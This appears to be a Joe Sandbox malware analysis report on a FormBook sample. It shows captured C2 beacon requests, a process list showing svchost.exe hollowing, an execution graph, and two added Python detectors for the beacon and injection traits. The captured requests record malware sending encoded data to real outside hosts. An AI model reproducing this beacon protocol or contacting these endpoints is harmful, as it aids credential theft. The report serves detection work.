                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 6c 65 65 30 6a 65 76 4c 72 52 30 42 62 6c 76 38 48 62 61 50 78 44 79 75 66 76 44 36 51 41 2f 69 75 7a 66 78 50 4b 75 63 75 54 6f 33 50 35 6f 4f 2f 6b 4d 35 78 63 52 6c 74 6b 45 72 51 2b 58 59 30 59 34 37 77 46 73 37 53 72 45 78 77 57 33 76 57 70 34 54 42 2f 35 69 44 62 72 79 67 30 6d 4f 44 34 63 43 71 65 4a 65 4f 2b 54 45 39 6e 66 53 72 44 74 78 6d 58 4d 51 6d 51 65 61 77 69 50 43 65 41 4b 51 51 49 74 2f 79 36 53 46 75 64 32 51 4f 6a 74 6d 67 49 54 53 2f 66 77 4d 31 65 2f 34 2b 6d 54 67 6b 6c 33 75 4c 49 4a 6a 6b 30 2b 2f 6f 49 4b 42 36 31 6e 5a 39 54 62 48 45 68 68 4b 33 4a 33 6d 61 35 70 55 59 67 6e 72
                                                                    Data Ascii: -0-L9xY=lee0jevLrR0Bblv8HbaPxDyufvD6QA/iuzfxPKucuTo3P5oO/kM5xcRltkErQ+XY0Y47wFs7SrExwW3vWp4TB/5iDbryg0mOD4cCqeJeO+TE9nfSrDtxmXMQmQeawiPCeAKQQIt/y6SFud2QOjtmgITS/fwM1e/4+mTgkl3uLIJjk0+/oIKB61nZ9TbHEhhK3J3ma5pUYgnr


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    38          192.168.2.6  50024        172.67.148.216  80                6728  C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 09:14:02.470993042 CET  817  OUT  POST /ufm5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.overlayoasis.quest
                                                                    Origin: http://www.overlayoasis.quest
                                                                    Referer: http://www.overlayoasis.quest/ufm5/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 6c 65 65 30 6a 65 76 4c 72 52 30 42 64 47 33 38 42 38 47 50 35 44 79 70 51 50 44 36 5a 67 2b 4b 75 7a 54 78 50 4c 71 32 79 32 34 33 4f 64 34 4f 2b 68 77 35 69 73 52 6c 6a 45 46 41 65 65 58 54 30 59 39 47 77 41 73 37 53 72 41 78 77 54 7a 76 57 36 51 55 41 76 35 33 50 37 72 77 2b 45 6d 4f 44 34 63 43 71 65 4e 67 4f 2b 37 45 2b 58 76 53 72 6d 4e 79 71 33 4d 54 76 77 65 61 36 79 50 47 65 41 4b 75 51 4a 78 47 79 2f 57 46 75 63 47 51 4f 33 78 6c 71 49 54 55 68 76 78 4e 39 62 53 4e 33 33 53 6c 36 7a 2f 57 65 36 64 66 6c 43 6a 6c 30 37 4b 69 6f 6c 48 62 39 52 44 31 45 42 68 67 31 4a 50 6d 49 75 6c 7a 58 55 43 49 61 62 52 48 33 30 7a 61 4d 79 42 30 63 63 46 7a 35 6d 78 4a 30 67 3d 3d
                                                                    Data Ascii: -0-L9xY=lee0jevLrR0BdG38B8GP5DypQPD6Zg+KuzTxPLq2y243Od4O+hw5isRljEFAeeXT0Y9GwAs7SrAxwTzvW6QUAv53P7rw+EmOD4cCqeNgO+7E+XvSrmNyq3MTvwea6yPGeAKuQJxGy/WFucGQO3xlqITUhvxN9bSN33Sl6z/We6dflCjl07KiolHb9RD1EBhg1JPmIulzXUCIabRH30zaMyB0ccFz5mxJ0g==


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    39          192.168.2.6  50025        172.67.148.216  80                6728  C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 09:14:05.078572989 CET  1830  OUT  POST /ufm5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.overlayoasis.quest
                                                                    Origin: http://www.overlayoasis.quest
                                                                    Referer: http://www.overlayoasis.quest/ufm5/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 6c 65 65 30 6a 65 76 4c 72 52 30 42 64 47 33 38 42 38 47 50 35 44 79 70 51 50 44 36 5a 67 2b 4b 75 7a 54 78 50 4c 71 32 79 32 77 33 4f 71 51 4f 2f 47 6b 35 7a 63 52 6c 72 6b 45 6e 65 65 58 43 30 65 56 4b 77 41 51 42 53 70 49 78 77 31 50 76 44 37 51 55 4a 76 35 33 48 62 72 7a 67 30 6d 68 44 38 42 4c 71 65 39 67 4f 2b 37 45 2b 56 33 53 69 54 74 79 73 33 4d 51 6d 51 65 65 77 69 50 75 65 45 75 68 51 4a 31 4a 79 4c 69 46 75 38 57 51 4d 45 5a 6c 77 49 54 57 67 76 77 65 39 62 57 6b 33 33 4f 44 36 7a 6a 38 65 36 35 66 6b 30 32 6b 75 35 4f 41 31 55 48 42 73 77 4c 51 43 47 5a 69 2f 4b 66 64 50 65 39 52 49 46 6e 6c 58 63 49 64 34 56 43 69 4f 68 56 67 56 72 6f 36 30 46 6b 57 32 62 65 41 63 59 6e 4b 61 35 4c 2b 7a 67 44 71 4a 67 50 79 59 4f 7a 62 31 48 75 6e 78 51 78 5a 4e 71 59 75 52 75 49 43 6d 33 63 62 77 62 4b 35 4f 52 6e 49 41 45 6e 2b 6c 34 30 74 2b 46 37 53 59 6e 31 4b 4c 4a 44 54 49 72 7a 42 6f 41 68 42 7a 55 38 55 55 54 4a 6d 75 67 76 4f 48 46 59 4d 66 38 41 67 6a 58 4e 37 6f 36 [TRUNCATED]
                                                                    Data Ascii: -0-L9xY= [TRUNCATED]


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                    40          192.168.2.6  50026        172.67.148.216  80
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 09:14:08.711512089 CET  525  OUT  GET /ufm5/?Mn=PdO8wZnxGnZX&-0-L9xY=oc2Ugo7X/DVLb3HoIsa141WPD8DQYVLt5ibtMrinrDozD5x17UU4sfIyzVFZWMP4gpVNgjcaO4w3lUPdIZ87CNE5Lom3+E6tX7ctr5EfQpvE80XMoDlosFwsnFO5slPeaFGzRec= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.overlayoasis.quest
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
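
The sessions above show the FormBook beaconing pattern as captured here: the same two parameter names (Mn in the query string, -0-L9xY carrying a base64-looking blob in the query string or the POST body) sent to unrelated Host values, a four-character directory per host (/oqj2/, /ufm5/), Connection: close on every request, a 302 from the decoy domain, and a 2011-vintage Chromium/12 User-Agent. The Python below is an added example, not part of the Joe Sandbox report and not FormBook or Joe Security code: it parses raw HTTP/1.1 request text and scores those traits, then correlates blob parameter names across hosts. The score threshold, the 40-character blob cut-off and the assumption that the parameter names stay stable across decoy hosts are mine; the sample requests are constructed from the request lines shown in this report plus one benign request.

```python
"""Heuristic spotter for FormBook-style HTTP beacons.

Added example, not Joe Sandbox code. The traits are taken from the sessions
shown in this report; the score threshold (3 of 4) and the 40-character blob
cut-off are assumptions.
"""
import re
from dataclasses import dataclass

LEGACY_UA = "Chromium/12.0.742.112"              # stale UA on every request
CAMPAIGN_DIR = re.compile(r"^/([a-z0-9]{4})/$")  # /oqj2/, /ufm5/
QS_PARAM = re.compile(r"[?&]([^=&]+)=([^&]*)")
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")  # bot does not URL-encode


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: dict
    body: str = ""

    @classmethod
    def parse(cls, raw: str) -> "HttpRequest":
        """Parse one raw HTTP/1.1 request (CRLF line endings)."""
        head, _, body = raw.partition("\r\n\r\n")
        lines = head.split("\r\n")
        method, target, _version = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        return cls(method, target, headers, body)


def c2_indicators(req: HttpRequest) -> dict:
    """Score one request against the traits observed in the report."""
    path, _, query = req.target.partition("?")
    match = CAMPAIGN_DIR.match(path)
    ind = {
        "host": req.headers.get("host", ""),
        "campaign": match.group(1) if match else None,
        "legacy_ua": LEGACY_UA in req.headers.get("user-agent", ""),
        "conn_close": req.headers.get("connection", "").lower() == "close",
        "blob_params": [],
    }
    # GET carries the blob in the query string, POST in the form body.
    source = query if req.method == "GET" else req.body
    pairs = QS_PARAM.findall("?" + source) if source else []
    for name, value in pairs:
        if len(value) >= 40 and B64_BLOB.match(value):
            ind["blob_params"].append(name)
    hits = sum([ind["campaign"] is not None, ind["legacy_ua"],
                ind["conn_close"], bool(ind["blob_params"])])
    ind["score"] = hits
    ind["suspect"] = hits >= 3
    return ind


def correlate(reqs) -> dict:
    """Blob parameter names reused across two or more distinct hosts.
    FormBook rotates Host across decoy domains but keeps the field names."""
    by_param = {}
    for req in reqs:
        ind = c2_indicators(req)
        for name in ind["blob_params"]:
            by_param.setdefault(name, set()).add(ind["host"])
    return {p: sorted(h) for p, h in by_param.items() if len(h) >= 2}


# Constructed from the request lines in this report, plus one benign request.
UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) "
      "Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30")
SAMPLE_REQUESTS = [
    "GET /oqj2/?Mn=PdO8wZnxGnZX&-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1idJuR6"
    "ndicPlBASrfeljqr7NFo/3ruzmmh7usSa3Ts+9UehuGvsJDxVXRAIIPhWP6NCAav+HV8QwX1dk0t+FHM"
    "IvusdCtCdZ0= HTTP/1.1\r\nHost: www.100millionjobs.africa\r\nConnection: close\r\n"
    "User-Agent: " + UA + "\r\n\r\n",
    "POST /ufm5/ HTTP/1.1\r\nHost: www.overlayoasis.quest\r\nConnection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nUser-Agent: " + UA + "\r\n\r\n"
    "-0-L9xY=lee0jevLrR0Bblv8HbaPxDyufvD6QA/iuzfxPKucuTo3P5oO/kM5xcRltkErQ+XY0Y47wFs7"
    "SrExwW3vWp4TB/5iDbryg0mOD4cCqeJeO+TE9nfSrDtxmXMQmQeawiPCeAKQQIt/y6SFud2QOjtmgITS"
    "/fwM1e/4+mTgkl3uLIJjk0+/oIKB61nZ9TbHEhhK3J3ma5pUYgnr",
    "GET /index.html?q=hello HTTP/1.1\r\nHost: example.org\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n\r\n",
]

if __name__ == "__main__":
    parsed = [HttpRequest.parse(r) for r in SAMPLE_REQUESTS]
    for req in parsed:
        print(req.method, req.target[:24], c2_indicators(req))
    print("shared blob params:", correlate(parsed))
```

The per-request score is deliberately weak on its own (a stale User-Agent or Connection: close alone proves nothing); the stronger signal is correlate(), which returns the blob parameter name -0-L9xY reused against both www.100millionjobs.africa and www.overlayoasis.quest, the same cross-host reuse visible in the sessions above.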


                                                                    Target ID:0
                                                                    Start time:03:09:59
                                                                    Start date:10/01/2025
                                                                    Path:C:\Users\user\Desktop\1162-201.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\1162-201.exe"
                                                                    Imagebase:0xc20000
                                                                    File size:1'618'432 bytes
                                                                    MD5 hash:334085B11D8F0DCAD01BB1C6414ACC91
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:03:09:59
                                                                    Start date:10/01/2025
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\1162-201.exe"
                                                                    Imagebase:0xbc0000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:03:10:34
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe"
                                                                    Imagebase:0x100000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4623485395.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:03:10:35
                                                                    Start date:10/01/2025
                                                                    Path:C:\Windows\SysWOW64\chkntfs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                                                                    Imagebase:0x430000
                                                                    File size:19'968 bytes
                                                                    MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:7
                                                                    Start time:03:10:48
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe"
                                                                    Imagebase:0x100000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4625453218.0000000005240000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:03:11:01
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff728280000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true
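
The process list above carries two injection tells a responder would pull out first: Target 2 is C:\Windows\SysWOW64\svchost.exe whose command line is the sample's own path (the sample started svchost.exe and replaced its image, which is why the FormBook YARA rule fires on its memory), and every YARA source is a memory dump whose name encodes a base address and a page protection, several of them 0x40 (PAGE_EXECUTE_READWRITE). The Python below is an added example and not Joe Sandbox code: it parses "Target ID" blocks in the layout shown here, flags image/command-line mismatches, and lists YARA-flagged regions that were RWX. The REPORT text is constructed from the Target 0, 2 and 6 blocks above; the assumption that the fourth and fifth dot-separated fields of a .sdmp name are the hex base address and page protection is mine, read off the names in this report rather than from documented Joe Sandbox format.

```python
"""Triage of the process list above: image/command-line mismatch and
FormBook YARA hits in RWX memory.

Added example, not Joe Sandbox code. REPORT is constructed from the Target
blocks in this report. The .sdmp name layout (field 4 = base address,
field 5 = page protection, both hex) is an assumption made from the names
shown here, not documented Joe Sandbox format.
"""
import ntpath
import re

PAGE_EXECUTE_READWRITE = 0x40   # Windows memory-protection constant

REPORT = r"""
Target ID:0
Path:C:\Users\user\Desktop\1162-201.exe
Commandline:"C:\Users\user\Desktop\1162-201.exe"
Target ID:2
Path:C:\Windows\SysWOW64\svchost.exe
Commandline:"C:\Users\user\Desktop\1162-201.exe"
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Target ID:6
Path:C:\Windows\SysWOW64\chkntfs.exe
Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
"""


def parse_targets(text):
    """Split 'Target ID:' blocks into dicts of field -> value plus YARA sources."""
    targets, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Target ID:"):
            cur = {"id": int(line.split(":", 1)[1]), "yara": []}
            targets.append(cur)
        elif cur is None or not line:
            continue
        elif line.startswith("• Rule:"):
            m = re.search(r"Source: (\S+\.sdmp)", line)
            if m:
                cur["yara"].append(m.group(1))
        elif ":" in line:
            key, value = line.split(":", 1)
            cur[key.strip()] = value.strip()
    return targets


def image_cmdline_mismatch(t):
    """True when the executable named on the command line is not the mapped
    image: the hollowing tell on Target 2 (svchost.exe running the sample's
    command line)."""
    cmd = t.get("Commandline", "").strip('"').split('"')[0]
    if not cmd:
        return False
    return ntpath.basename(cmd).lower() != ntpath.basename(t["Path"]).lower()


def rwx_yara_regions(t):
    """(base address, protection) for each YARA-flagged dump whose pages were RWX."""
    out = []
    for name in t["yara"]:
        parts = name.split(".")
        base, protect = int(parts[3], 16), int(parts[4], 16)   # assumed layout
        if protect & PAGE_EXECUTE_READWRITE:
            out.append((base, protect))
    return out


def triage(text):
    """Return (target id, image name, reasons) for every process worth a look."""
    findings = []
    for t in parse_targets(text):
        reasons = []
        if image_cmdline_mismatch(t):
            reasons.append("image/cmdline mismatch")
        rwx = rwx_yara_regions(t)
        if rwx:
            reasons.append("FormBook YARA hit in %d RWX region(s)" % len(rwx))
        if reasons:
            findings.append((t["id"], ntpath.basename(t["Path"]), reasons))
    return findings


if __name__ == "__main__":
    for tid, image, reasons in triage(REPORT):
        print("Target %d %s: %s" % (tid, image, "; ".join(reasons)))
```

On the constructed REPORT this flags Target 2 (svchost.exe) for both the command-line mismatch and two RWX regions, and Target 6 (chkntfs.exe) for one RWX region; the two 0x04 (PAGE_READWRITE) dumps on chkntfs.exe are FormBook data, not code, and are left out. Target 0, the original sample, is not reported because its own image matches its command line and carries no YARA hit.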


                                                                      Execution Graph

                                                                      Execution Coverage:4.7%
                                                                      Dynamic/Decrypted Code Coverage:1.7%
                                                                      Signature Coverage:2.7%
                                                                      Total number of Nodes:1030
                                                                      Total number of Limit Nodes:32
                                                                      execution_graph 46824 c22de3 46825 c22df0 __wsopen_s 46824->46825 46826 c22e09 46825->46826 46827 c62c2b ___scrt_fastfail 46825->46827 46840 c23aa2 46826->46840 46829 c62c47 GetOpenFileNameW 46827->46829 46831 c62c96 46829->46831 46898 c26b57 46831->46898 46835 c62cab 46835->46835 46837 c22e27 46868 c244a8 46837->46868 46910 c61f50 46840->46910 46843 c23ae9 46916 c2a6c3 46843->46916 46844 c23ace 46845 c26b57 22 API calls 46844->46845 46847 c23ada 46845->46847 46912 c237a0 46847->46912 46850 c22da5 46851 c61f50 __wsopen_s 46850->46851 46852 c22db2 GetLongPathNameW 46851->46852 46853 c26b57 22 API calls 46852->46853 46854 c22dda 46853->46854 46855 c23598 46854->46855 46967 c2a961 46855->46967 46858 c23aa2 23 API calls 46859 c235b5 46858->46859 46860 c235c0 46859->46860 46861 c632eb 46859->46861 46972 c2515f 46860->46972 46865 c6330d 46861->46865 46984 c3ce60 41 API calls 46861->46984 46867 c235df 46867->46837 46985 c24ecb 46868->46985 46871 c63833 47007 c92cf9 46871->47007 46872 c24ecb 94 API calls 46875 c244e1 46872->46875 46874 c63848 46876 c6384c 46874->46876 46877 c63869 46874->46877 46875->46871 46878 c244e9 46875->46878 47057 c24f39 46876->47057 46880 c3fe0b 22 API calls 46877->46880 46881 c63854 46878->46881 46882 c244f5 46878->46882 46890 c638ae 46880->46890 47063 c8da5a 82 API calls 46881->47063 47056 c2940c 136 API calls 2 library calls 46882->47056 46885 c63862 46885->46877 46886 c22e31 46887 c63a5f 46893 c63a67 46887->46893 46888 c24f39 68 API calls 46888->46893 46890->46887 46890->46893 46895 c29cb3 22 API calls 46890->46895 47033 c8967e 46890->47033 47036 c90b5a 46890->47036 47042 c2a4a1 46890->47042 47050 c23ff7 46890->47050 47064 c895ad 42 API calls _wcslen 46890->47064 46893->46888 47065 c8989b 82 API calls __wsopen_s 46893->47065 46895->46890 46899 c26b67 _wcslen 46898->46899 46900 c64ba1 46898->46900 46903 c26ba2 46899->46903 46904 c26b7d 46899->46904 46901 c293b2 22 API calls 
46900->46901 46902 c64baa 46901->46902 46902->46902 46906 c3fddb 22 API calls 46903->46906 47411 c26f34 22 API calls 46904->47411 46908 c26bae 46906->46908 46907 c26b85 __fread_nolock 46907->46835 46909 c3fe0b 22 API calls 46908->46909 46909->46907 46911 c23aaf GetFullPathNameW 46910->46911 46911->46843 46911->46844 46913 c237ae 46912->46913 46922 c293b2 46913->46922 46915 c22e12 46915->46850 46917 c2a6d0 46916->46917 46918 c2a6dd 46916->46918 46917->46847 46919 c3fddb 22 API calls 46918->46919 46920 c2a6e7 46919->46920 46921 c3fe0b 22 API calls 46920->46921 46921->46917 46923 c293c0 46922->46923 46924 c293c9 __fread_nolock 46922->46924 46923->46924 46926 c2aec9 46923->46926 46924->46915 46924->46924 46927 c2aedc 46926->46927 46931 c2aed9 __fread_nolock 46926->46931 46932 c3fddb 46927->46932 46929 c2aee7 46942 c3fe0b 46929->46942 46931->46924 46934 c3fde0 46932->46934 46935 c3fdfa 46934->46935 46938 c3fdfc 46934->46938 46952 c4ea0c 46934->46952 46959 c44ead 7 API calls 2 library calls 46934->46959 46935->46929 46937 c4066d 46961 c432a4 RaiseException 46937->46961 46938->46937 46960 c432a4 RaiseException 46938->46960 46941 c4068a 46941->46929 46944 c3fddb 46942->46944 46943 c4ea0c ___std_exception_copy 21 API calls 46943->46944 46944->46943 46945 c3fdfa 46944->46945 46947 c3fdfc 46944->46947 46964 c44ead 7 API calls 2 library calls 46944->46964 46945->46931 46948 c4066d 46947->46948 46965 c432a4 RaiseException 46947->46965 46966 c432a4 RaiseException 46948->46966 46951 c4068a 46951->46931 46957 c53820 __dosmaperr 46952->46957 46953 c5385e 46963 c4f2d9 20 API calls __dosmaperr 46953->46963 46955 c53849 RtlAllocateHeap 46956 c5385c 46955->46956 46955->46957 46956->46934 46957->46953 46957->46955 46962 c44ead 7 API calls 2 library calls 46957->46962 46959->46934 46960->46937 46961->46941 46962->46957 46963->46956 46964->46944 46965->46948 46966->46951 46968 c3fe0b 22 API calls 46967->46968 46969 c2a976 46968->46969 46970 c3fddb 22 API calls 46969->46970 46971 c235aa 
46970->46971 46971->46858 46973 c2516e 46972->46973 46977 c2518f __fread_nolock 46972->46977 46975 c3fe0b 22 API calls 46973->46975 46974 c3fddb 22 API calls 46976 c235cc 46974->46976 46975->46977 46978 c235f3 46976->46978 46977->46974 46979 c23605 46978->46979 46983 c23624 __fread_nolock 46978->46983 46982 c3fe0b 22 API calls 46979->46982 46980 c3fddb 22 API calls 46981 c2363b 46980->46981 46981->46867 46982->46983 46983->46980 46984->46861 47066 c24e90 LoadLibraryA 46985->47066 46990 c24ef6 LoadLibraryExW 47074 c24e59 LoadLibraryA 46990->47074 46991 c63ccf 46992 c24f39 68 API calls 46991->46992 46994 c63cd6 46992->46994 46996 c24e59 3 API calls 46994->46996 46998 c63cde 46996->46998 47096 c250f5 46998->47096 46999 c24f20 46999->46998 47000 c24f2c 46999->47000 47001 c24f39 68 API calls 47000->47001 47003 c244cd 47001->47003 47003->46871 47003->46872 47006 c63d05 47008 c92d15 47007->47008 47009 c2511f 64 API calls 47008->47009 47010 c92d29 47009->47010 47239 c92e66 47010->47239 47013 c250f5 40 API calls 47014 c92d56 47013->47014 47015 c250f5 40 API calls 47014->47015 47016 c92d66 47015->47016 47017 c250f5 40 API calls 47016->47017 47018 c92d81 47017->47018 47019 c250f5 40 API calls 47018->47019 47020 c92d9c 47019->47020 47021 c2511f 64 API calls 47020->47021 47022 c92db3 47021->47022 47023 c4ea0c ___std_exception_copy 21 API calls 47022->47023 47024 c92dba 47023->47024 47025 c4ea0c ___std_exception_copy 21 API calls 47024->47025 47026 c92dc4 47025->47026 47027 c250f5 40 API calls 47026->47027 47028 c92dd8 47027->47028 47029 c928fe 27 API calls 47028->47029 47030 c92dee 47029->47030 47031 c92d3f 47030->47031 47245 c922ce 47030->47245 47031->46874 47034 c3fe0b 22 API calls 47033->47034 47035 c896ae __fread_nolock 47034->47035 47035->46890 47037 c90b65 47036->47037 47038 c3fddb 22 API calls 47037->47038 47039 c90b7c 47038->47039 47405 c29cb3 47039->47405 47043 c2a52b 47042->47043 47048 c2a4b1 __fread_nolock 47042->47048 47045 c3fe0b 22 API calls 47043->47045 47044 
c3fddb 22 API calls 47046 c2a4b8 47044->47046 47045->47048 47047 c3fddb 22 API calls 47046->47047 47049 c2a4d6 47046->47049 47047->47049 47048->47044 47049->46890 47051 c2400a 47050->47051 47053 c240ae 47050->47053 47052 c3fe0b 22 API calls 47051->47052 47055 c2403c 47051->47055 47052->47055 47053->46890 47054 c3fddb 22 API calls 47054->47055 47055->47053 47055->47054 47056->46886 47058 c24f43 47057->47058 47060 c24f4a 47057->47060 47059 c4e678 67 API calls 47058->47059 47059->47060 47061 c24f6a FreeLibrary 47060->47061 47062 c24f59 47060->47062 47061->47062 47062->46881 47063->46885 47064->46890 47065->46893 47067 c24ec6 47066->47067 47068 c24ea8 GetProcAddress 47066->47068 47071 c4e5eb 47067->47071 47069 c24eb8 47068->47069 47069->47067 47070 c24ebf FreeLibrary 47069->47070 47070->47067 47104 c4e52a 47071->47104 47073 c24eea 47073->46990 47073->46991 47075 c24e6e GetProcAddress 47074->47075 47076 c24e8d 47074->47076 47077 c24e7e 47075->47077 47079 c24f80 47076->47079 47077->47076 47078 c24e86 FreeLibrary 47077->47078 47078->47076 47080 c3fe0b 22 API calls 47079->47080 47081 c24f95 47080->47081 47165 c25722 47081->47165 47083 c24fa1 __fread_nolock 47084 c250a5 47083->47084 